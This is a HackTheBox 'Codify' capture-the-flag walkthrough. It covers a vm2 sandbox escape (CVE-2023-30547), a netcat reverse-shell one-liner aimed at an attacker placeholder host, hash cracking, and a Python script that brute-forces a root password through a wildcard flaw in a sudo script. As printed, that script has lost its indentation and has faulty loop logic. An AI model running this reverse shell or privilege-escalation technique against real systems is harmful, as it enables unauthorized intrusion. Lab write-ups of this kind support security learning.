HackTheBox | Codify Walkthrough
Hi Folks!
Hope you are doing well.
let’s get started with enumeration.

Nmap Scan
nmap -T4 -v -p- -sCV <target_ip>

We got two open ports: port 22 running a SSH, port 80 running HTTP.
The nmap disclose domain name. so let’s add it to the hosts file.
echo "<target_ip> codify.htb" >> /etc/hosts
Web Enumeration

Doing manual enumeration, we got /editor
page, we can run node js code in sandbox environment.

After trying to bypassing sandbox to get RCE or to read system files, I found it has some limitations on /limitations

Here, I couldn’t bypass the sandbox envirnoment. So I returned back to navigate through the pages.
I got an interesting finding on /about

It says it is using the vm2 library to run Javascript code in a sandbox environment.
Here, I googled it, and I found an exploitation to bypass the sandbox and get RCE on the system.
Sandbox Bypass CVE-2023–30547, which allows an attacker to bypass sandbox limitations and execute arbitrary code in the host environment.
Imodified the POC to get the ID of the user to test it.

Let’s modify the POC to get a shell!!
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc <attacker_ip> <port> >/tmp/f

Lateral Movement
After doing basic manual enumeration on the box, I found nothing.
I decided to check the web home directory /var/www
and I found a database file in /var/www/contacts/

We got a hash from the database file, let’s crack it.

SSH Login
We got the password for Joshua, let’s try to SSH using this credentials.

Privilege Escalation
By running sudo -l
we can execute /opt/scripts/mysql-backup.sh
script as root.

Let’s view the script.

By running the script, the script get the root password to create a backup of the database.
The comparison of the input with root is vulnerable. If we put *
as input it will be accepted.
Here, we can create a script to brute force the root password until we got the password, for example: a*
, b*
, etc..
Here, the used python script to bruteforce the password.
import string
import subprocess
all = list(string.ascii_letters + string.digits)
password = ""
found = False
while not found:
for character in all:
command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout
if "Password confirmed!" in output:
password += character
found = True
After running the script, we got the root password.

This was great fun!
I hope you enjoyed the walkthrough. I waiting for your feedbacks.
Don’t forget to check other walkthroughs.